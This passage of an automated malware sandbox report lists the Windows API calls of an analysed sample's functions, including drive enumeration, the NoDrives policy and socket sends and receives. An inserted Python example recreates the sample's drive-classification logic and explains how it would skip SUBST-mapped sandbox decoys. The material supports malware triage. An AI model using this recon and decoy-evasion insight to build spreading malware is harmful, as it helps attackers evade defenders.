                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                    • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                    • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                      • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                      • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                    • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                    • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3488799664-0
                                                                                                                                    • Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                    • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                    • Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                    • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                    • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                    • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                    • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                    • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                    APIs
                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                    • Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                    • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                    • Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                    • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                    APIs
                                                                                                                                    • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                    • QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
                                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                    • String ID: ?c@$\??\
                                                                                                                                    • API String ID: 1681518211-744975932
                                                                                                                                    • Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                    • Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
                                                                                                                                    • Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                    • Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
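The two drive-related functions traced above belong together: one reads the GetLogicalDrives bitmask and the Explorer NoDrives policy value, the other calls GetDriveTypeW and QueryDosDeviceW on a letter and compares the first four characters of the device target with \??\. As an added example (not code from the report or from the sample), the Python below decodes those bitmasks the way the APIs define them and reproduces the \??\ prefix test. That the sample masks policy-hidden letters out of the logical-drive bitmask and skips SUBST-style mappings is an inference from the API sequence, not something the report states. The sample drive state and the live_windows_snapshot helper are constructed for this example.

```python
"""Decode the drive-enumeration logic implied by the GetLogicalDrives, NoDrives and
QueryDosDeviceW calls in the report. Added example; the sample state below is constructed."""
import sys
from typing import Dict, Iterable, List, Optional

# Return values of GetDriveTypeW (winbase.h)
DRIVE_TYPES = {
    0: "UNKNOWN", 1: "NO_ROOT_DIR", 2: "REMOVABLE", 3: "FIXED",
    4: "REMOTE", 5: "CDROM", 6: "RAMDISK",
}
ALL_LETTERS_MASK = (1 << 26) - 1  # bits for A: .. Z:


def bitmask_to_letters(mask: int) -> List[str]:
    """GetLogicalDrives() and the Explorer NoDrives policy share one layout:
    bit n set means drive letter chr(ord('A') + n)."""
    return [chr(ord("A") + n) for n in range(26) if (mask >> n) & 1]


def letters_to_bitmask(letters: Iterable[str]) -> int:
    """Inverse of bitmask_to_letters; used here to build sample masks."""
    mask = 0
    for letter in letters:
        mask |= 1 << (ord(letter.upper()) - ord("A"))
    return mask


def visible_drives(logical_mask: int, nodrives_mask: int) -> List[str]:
    """Letters that exist and are not hidden by policy. That the sample combines the two
    masks this way is an inference from the API sequence, not stated in the report."""
    return bitmask_to_letters(logical_mask & ~nodrives_mask & ALL_LETTERS_MASK)


def is_subst_drive(dos_device_target: str) -> bool:
    """QueryDosDeviceW on a SUBST'd letter returns a target such as \\??\\C:\\dir, while real
    volumes resolve to \\Device\\...; the traced function compares the first 4 characters."""
    return dos_device_target[:4] == "\\??\\"


def classify_drives(logical_mask: int, nodrives_mask: int,
                    drive_types: Dict[str, int], dos_targets: Dict[str, str]) -> Dict[str, str]:
    """Apply the three checks in the order the report shows them."""
    result: Dict[str, str] = {}
    for letter in visible_drives(logical_mask, nodrives_mask):
        if is_subst_drive(dos_targets.get(letter, "")):
            result[letter] = "SUBST"
            continue
        result[letter] = DRIVE_TYPES.get(drive_types.get(letter, 0), "UNKNOWN")
    return result


# Constructed sample state (not taken from the report): C: fixed disk, D: CD-ROM hidden by
# policy, E: removable stick, X: a SUBST mapping of a folder on C:.
SAMPLE_LOGICAL = letters_to_bitmask("CDEX")
SAMPLE_NODRIVES = letters_to_bitmask("D")
SAMPLE_TYPES = {"C": 3, "D": 5, "E": 2, "X": 3}
SAMPLE_TARGETS = {
    "C": "\\Device\\HarddiskVolume3",
    "D": "\\Device\\CdRom0",
    "E": "\\Device\\HarddiskVolume7",
    "X": "\\??\\C:\\Users\\Public",
}


def live_windows_snapshot() -> Optional[Dict[str, str]]:
    """Run the same three API calls on a real Windows host via ctypes/winreg (hypothetical
    helper for this example); returns None elsewhere so the module stays importable."""
    if sys.platform != "win32":
        return None
    import ctypes
    import winreg
    from ctypes import wintypes

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.GetLogicalDrives.restype = wintypes.DWORD
    k32.GetDriveTypeW.argtypes = [wintypes.LPCWSTR]
    k32.GetDriveTypeW.restype = wintypes.UINT
    k32.QueryDosDeviceW.argtypes = [wintypes.LPCWSTR, wintypes.LPWSTR, wintypes.DWORD]
    k32.QueryDosDeviceW.restype = wintypes.DWORD

    nodrives = 0
    try:  # same key and value name the report shows; the value is absent on most hosts
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                            r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer") as key:
            nodrives = int(winreg.QueryValueEx(key, "NoDrives")[0])
    except OSError:
        pass

    types, targets = {}, {}
    buf = ctypes.create_unicode_buffer(0x208)  # same buffer length as the traced call
    logical = k32.GetLogicalDrives()
    for letter in bitmask_to_letters(logical):
        types[letter] = k32.GetDriveTypeW(f"{letter}:\\")
        targets[letter] = buf.value if k32.QueryDosDeviceW(f"{letter}:", buf, 0x208) else ""
    return classify_drives(logical, nodrives, types, targets)


if __name__ == "__main__":
    print(live_windows_snapshot() or classify_drives(
        SAMPLE_LOGICAL, SAMPLE_NODRIVES, SAMPLE_TYPES, SAMPLE_TARGETS))
```

On the constructed state the routine reports C: as FIXED, E: as REMOVABLE and X: as SUBST, and never sees D: because the policy bit masks it out. For triage this matters in two ways: a removable-media spreader that honours NoDrives will skip any letter an administrator hides, and the \??\ comparison is a cheap way to tell a real volume from a directory mapped with subst, so a sandbox that exposes its decoy "USB stick" as a SUBST drive would not be touched by this code path.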
APIs
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
• InterlockedDecrement.KERNEL32(?), ref: 004018B1
  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
• String ID:
• API String ID: 3966618661-0
• Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
• Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
• Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
• Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
APIs
• CreateFileW.KERNEL32(004163E0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
• WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
• FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
• CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
• InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 442028454-0
                                                                                                                                    • Opcode ID: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                    • Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
                                                                                                                                    • Opcode Fuzzy Hash: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                    • Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                    • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                    • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                    • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                    • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                    APIs
                                                                                                                                    • SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                      • Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                                    • Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                    • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                    • Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                    • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                    APIs
                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                    • Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                    • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                    • Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                    • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                    APIs
                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                    APIs
                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                    APIs
                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040DED8
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                     • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3102160386-0
                                                                                                                                    • Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                    • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                    • Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                    • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
• LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
• LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
